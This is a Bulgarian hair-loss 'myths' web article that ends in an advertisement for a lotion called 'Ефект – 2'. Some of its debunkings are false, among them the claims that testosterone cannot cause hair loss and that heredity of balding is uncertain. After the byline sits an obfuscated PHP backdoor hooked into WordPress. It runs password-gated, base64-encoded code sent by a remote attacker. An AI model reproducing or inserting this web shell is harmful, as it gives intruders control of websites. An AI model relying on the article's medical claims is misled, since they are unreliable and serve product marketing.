Митове за оплешивяването и косопада | Косопад

Митове за оплешивяването и косопада

Разтревожени от падането на косата,  хората са склонни да вярват на всякакви глупости, и да пръскат парите си за всевъзможни неща, само и само да се отърват от този проблем. Истината обаче е, че много от нещата, които сме чували за оплешивяването са само митове. Ето някои от най – известните:

kosopad-recepti

1. Риска за косопад се увеличава при носенето на шапка
За да стане това нещо, шапката  трябва да е толкова стегната, че да прекъсне притока на кръв до главата. Никой естествено няма да издържи да носи такова нещо.

2. Ако страдате от оплешивяване, то имате проблеми с тестостерона
Тестостеронът няма как да причини косопад

3. Изключително вредни са геловете, балсамите за коса, някои шампоаниopleshivqvane-prichini
Няма такова нещо, просто не трябва да се прекалява с употребата им.

4. Стресът често е причина за косопад
Не може да се каже, че това е лъжа, но при голям стрес просто растежа леко се забавя. Това трае два месеца, след което всичко се възстановява.

5. Колкото по – често се подстригвате, толкова повече косата ще расте
Глупости! Бързината на растежа си е една и съща, независимо от това дали тя ще се бръсне, подстригва, или няма да се третира изобщо.

6. Оплешивяването се предава генетично
Това не е съвсем сигурно.

7. Никакви  средства  не могат да помогнат
Има такива, които помагат! Опитайте с лосионът „Ефект – 2” и няма да съжалявате. Не случайно стотици хора споделят радостта си от факта, че благодарение на него, отново могат да се радват на хубава и здрава коса. Пък и без да е опитал човек няма как да се увери дали дадено средство  няма да му помогне, затова поръчайте и само наблюдавайте ефекта му.

03. май 2014 14:29:58 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}